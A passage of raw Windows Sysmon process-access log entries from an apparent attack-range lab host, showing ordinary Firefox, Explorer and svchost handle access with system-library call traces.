Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c5a73|C:\Program Files\Mozilla Firefox\xul.dll+197b04e|C:\Program Files\Mozilla Firefox\xul.dll+2123438|C:\Program Files\Mozilla Firefox\xul.dll+24095e|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+19c174|C:\Program Files\Mozilla Firefox\xul.dll+107a9c 10341000x800000000000000016914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19843e|UNKNOWN(000000238BDB2014) 10341000x800000000000000016905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+3ee10e1|C:\Program Files\Mozilla Firefox\xul.dll+3ef4ae5|C:\Program Files\Mozilla Firefox\xul.dll+3ef4cfe|C:\Program Files\Mozilla Firefox\xul.dll+3ef4c54|C:\Program Files\Mozilla Firefox\xul.dll+122494a|C:\Program Files\Mozilla Firefox\xul.dll+13e0e4|C:\Program Files\Mozilla Firefox\xul.dll+1878175|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+19c174|C:\Program Files\Mozilla Firefox\xul.dll+1a2d2b|C:\Program Files\Mozilla Firefox\xul.dll+3ed3ff3|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53 10341000x800000000000000016904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3605-00000000A301}4588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+3ee10e1|C:\Program Files\Mozilla Firefox\xul.dll+3ef4ae5|C:\Program Files\Mozilla Firefox\xul.dll+3ef4cfe|C:\Program Files\Mozilla Firefox\xul.dll+3ef4c54|C:\Program Files\Mozilla Firefox\xul.dll+122494a|C:\Program Files\Mozilla Firefox\xul.dll+13e0e4|C:\Program Files\Mozilla Firefox\xul.dll+1878175|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+19c174|C:\Program Files\Mozilla Firefox\xul.dll+1a2d2b|C:\Program Files\Mozilla Firefox\xul.dll+3ed3ff3|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53 10341000x800000000000000016903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.895{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945D-6005-3505-00000000A301}4260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2bd4c4b|C:\Program Files\Mozilla Firefox\xul.dll+1bc0e77|C:\Program Files\Mozilla Firefox\xul.dll+2342d8|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+3ee10e1|C:\Program Files\Mozilla Firefox\xul.dll+3ef4ae5|C:\Program Files\Mozilla Firefox\xul.dll+3ef4cfe|C:\Program Files\Mozilla Firefox\xul.dll+3ef4c54|C:\Program Files\Mozilla Firefox\xul.dll+122494a|C:\Program Files\Mozilla Firefox\xul.dll+13e0e4|C:\Program Files\Mozilla Firefox\xul.dll+1878175|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+19c174|C:\Program Files\Mozilla Firefox\xul.dll+1a2d2b|C:\Program Files\Mozilla Firefox\xul.dll+3ed3ff3|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53 10341000x800000000000000016902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.845{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2debab7|C:\Program Files\Mozilla Firefox\xul.dll+2deb9d9|C:\Program Files\Mozilla Firefox\xul.dll+2ed10b5|C:\Program Files\Mozilla Firefox\xul.dll+2ecde71|C:\Program Files\Mozilla Firefox\xul.dll+2ecc384|C:\Program Files\Mozilla Firefox\xul.dll+2ec3074 10341000x800000000000000016901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.842{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000016900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.841{59A5CD1D-93FA-6005-FC04-00000000A301}37845232C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.817{59A5CD1D-93FA-6005-FC04-00000000A301}37841028C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.817{59A5CD1D-93FA-6005-FC04-00000000A301}37841028C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.817{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.817{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.770{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.724{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2bd18cd|C:\Program Files\Mozilla Firefox\xul.dll+2ba6aa4|C:\Program Files\Mozilla Firefox\xul.dll+2ba89c6|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c5a73|C:\Program Files\Mozilla Firefox\xul.dll+197b04e|C:\Program Files\Mozilla Firefox\xul.dll+2123438|C:\Program Files\Mozilla Firefox\xul.dll+24095e|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+19c174 10341000x800000000000000016893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.724{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c78|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c5a73|C:\Program Files\Mozilla Firefox\xul.dll+197b04e 10341000x800000000000000016892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.724{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c51|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c5a73|C:\Program Files\Mozilla Firefox\xul.dll+197b04e 10341000x800000000000000016891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 